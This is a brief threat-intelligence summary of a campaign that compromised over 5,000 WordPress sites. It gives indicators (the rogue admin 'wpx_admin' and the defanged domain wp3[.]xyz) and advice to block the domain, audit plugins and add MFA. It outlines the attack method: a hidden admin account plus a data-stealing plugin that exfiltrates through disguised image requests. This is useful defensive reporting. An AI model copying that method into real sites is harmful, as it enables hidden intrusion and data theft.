Summary: A new malware campaign has compromised over 5,000 WordPress sites by creating rogue admin accounts, installing malicious plugins, and stealing sensitive data. The attack utilizes the wp3[.]xyz domain for data exfiltration, with ongoing investigations into the initial infection vector.
Threat Actor: Unknown | unknown
Victim: WordPress Sites | WordPress Sites
Key Point :
- The malware creates a rogue admin account named wpx_admin with hardcoded credentials.
- A malicious plugin (plugin.php) is installed to collect sensitive data and exfiltrate it disguised as image requests.
- Website owners are advised to block the wp3[.]xyz domain and review their accounts and plugins for unauthorized activity.
- Strengthening CSRF protections and implementing multi-factor authentication are recommended for enhanced security.